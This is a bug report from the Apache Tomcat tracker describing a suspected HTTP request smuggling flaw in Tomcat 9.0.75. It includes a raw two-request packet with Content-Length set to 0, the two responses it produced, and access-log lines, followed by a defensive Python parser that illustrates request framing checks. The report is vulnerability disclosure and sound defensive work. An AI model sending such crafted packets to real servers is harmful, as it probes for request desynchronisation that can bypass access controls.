https://bz.apache.org/bugzilla/show_bug.cgi?id=67300
Bug ID: 67300
Summary: Suspected HTTP request smuggling vulnerability
Product: Tomcat 9
Version: 9.0.75
Hardware: PC
OS: Linux
Status: NEW
Severity: normal
Priority: P2
Component: Catalina
Assignee: dev@tomcat.apache.org
Reporter: digital...@huawei.com
Target Milestone: -----

It is suspected that an HTTP request smuggling vulnerability exists. An attacker can construct another request in the message body to achieve the attack effect. Construct the following packet. Because Content-Length is 0, the messages after line 19 are processed as the second request. The Wireshark tool is used to capture a tcpdump. It is found that the sender sends only one packet, but Tomcat responds twice. In addition, two records are recorded in the localhost_access log.

e.g.:

===============================================================================
POST / HTTP/1.1
Host: XXXXXXXX:8443
Cookie: sessionId=7E0E45CDE615B204BD8426EA280ED3FDDFDF3822CEF1EB41
Cache-Control: max-age=0
Sec-Ch-Ua: "Chromium";v="105", "Not)A;Brand";v="8"
Sec-Ch-Ua-Mobile: ?0
Sec-Ch-Ua-Platform: "Windows"
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.5195.102 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: https://135.191.162.133:8443/html/common/main.jsp
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: keep-alive
Content-Length: 0
Content-Type: application/x-www-form-urlencoded

GET / HTTP/1.1
Host: XXXXXXXX:8443
Cookie: sessionId=7E0E45CDE615B204BD8426EA280ED3FDDFDF3822CEF1EB41
Cache-Control: max-age=0
Sec-Ch-Ua: "Chromium";v="105", "Not)A;Brand";v="8"
Sec-Ch-Ua-Mobile: ?0
Sec-Ch-Ua-Platform: "Windows"
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.5195.102 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: https://135.191.162.133:8443/html/common/main.jsp
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
=====================================================================

response

HTTP/1.1 403
Set-Cookie: sessionId=FB4EBCD594EE7940D6603A976874DBA63A862B26438057BC; Path=/; Secure; HttpOnly; SameSite=Lax
Cache-Control: no-cache, no-store
Pragma: no-cache
X-Frame-Options: SAMEORIGIN
Content-Security-Policy: default-src 'self' 'unsafe-inline' 'unsafe-eval'
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
Strict-Transport-Security: max-age=3153600;includeSubDomains
Referrer-Policy: same-origin
Content-Type: text/html;charset=UTF-8
Content-Length: 18
Date: Thu, 07 Sep 2023 23:15:10 GMT
Keep-Alive: timeout=20
Connection: keep-alive

InValid CSRF Token
HTTP/1.1 200
Set-Cookie: sessionId=C4DE25F4A422816F6C444CD3F447D91382A1921BBA8A3FE0; Path=/; Secure; HttpOnly; SameSite=Lax
Cache-Control: no-cache, no-store
Pragma: no-cache
X-Frame-Options: SAMEORIGIN
Content-Security-Policy: default-src 'self' 'unsafe-inline' 'unsafe-eval'
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
Strict-Transport-Security: max-age=3153600;includeSubDomains
Referrer-Policy: same-origin
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Transfer-Encoding: chunked
Date: Thu, 07 Sep 2023 23:15:10 GMT
Connection: close
=====================================================================

log in localhost_access.log

[07/Sep/2023:23:15:10 +0000]^180.59.110.8^-^POST / HTTP/1.1^Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.5195.102 Safari/537.36^https://XXXXXXXX:8443/html/common/main.jsp^-^application/x-www-form-urlencoded^zh-CN,zh;q=0.9^text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9^gzip, deflate^403^18^0.003^
[07/Sep/2023:23:15:10 +0000]^180.59.110.8^-^GET / HTTP/1.1^Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.5195.102 Safari/537.36^https://XXXXXXXX:8443/html/common/main.jsp^-^-^zh-CN,zh;q=0.9^text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9^gzip, deflate^200^33142^0.011^
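As an added illustration (not code from the report or from Tomcat), the parser below shows how a Content-Length framed HTTP/1.1 server splits the bytes in the packet above: the POST consumes its head plus zero body bytes, and the bytes that follow are read as the next request on the same keep-alive connection, which is what the two responses and the two access-log records reflect. It also applies the framing check a strict parser makes when Content-Length and Transfer-Encoding conflict; both sample streams are constructed, with the report's masked Host value reused.

```python
import re

# Constructed sample mirroring the report: a POST with Content-Length: 0 and a
# second request in the same stream (most of the real headers omitted).
SAMPLE = (
    b"POST / HTTP/1.1\r\nHost: XXXXXXXX:8443\r\nConnection: keep-alive\r\n"
    b"Content-Length: 0\r\nContent-Type: application/x-www-form-urlencoded\r\n\r\n"
    b"GET / HTTP/1.1\r\nHost: XXXXXXXX:8443\r\nConnection: close\r\n\r\n"
)
# Constructed stream with conflicting framing headers, which a strict parser
# must reject rather than resolve by guessing.
AMBIGUOUS = (
    b"POST / HTTP/1.1\r\nHost: XXXXXXXX:8443\r\nContent-Length: 4\r\n"
    b"Transfer-Encoding: chunked\r\n\r\n0\r\n\r\n"
)

def parse_requests(stream: bytes) -> list:
    """Split a raw HTTP/1.1 byte stream the way a Content-Length framed server
    does: each request consumes exactly its head plus Content-Length body bytes,
    and whatever remains is parsed as the next request on the connection."""
    requests, pos = [], 0
    while pos < len(stream):
        end = stream.find(b"\r\n\r\n", pos)
        if end == -1:
            raise ValueError("incomplete request head")
        request_line, *header_lines = stream[pos:end].decode("iso-8859-1").split("\r\n")
        headers = {}
        for line in header_lines:
            name, _, value = line.partition(":")
            headers.setdefault(name.strip().lower(), []).append(value.strip())
        # RFC 9112 section 6.3: a message carrying both Transfer-Encoding and
        # Content-Length, or several differing Content-Length values, is malformed.
        # This example does not decode chunked bodies, so any Transfer-Encoding is
        # rejected outright instead of being silently reinterpreted.
        if "transfer-encoding" in headers:
            raise ValueError("Transfer-Encoding present: not handled here, rejected")
        lengths = headers.get("content-length", ["0"])
        if len(set(lengths)) != 1 or not re.fullmatch(r"\d+", lengths[0]):
            raise ValueError("ambiguous Content-Length")
        body_start, body_len = end + 4, int(lengths[0])
        body = stream[body_start:body_start + body_len]
        if len(body) != body_len:
            raise ValueError("body truncated")
        requests.append({"request_line": request_line, "headers": headers, "body": body})
        pos = body_start + body_len
    return requests

def framing_ok(stream: bytes) -> bool:
    """True when the stream splits cleanly into well-framed requests."""
    try:
        parse_requests(stream)
        return True
    except ValueError:
        return False
```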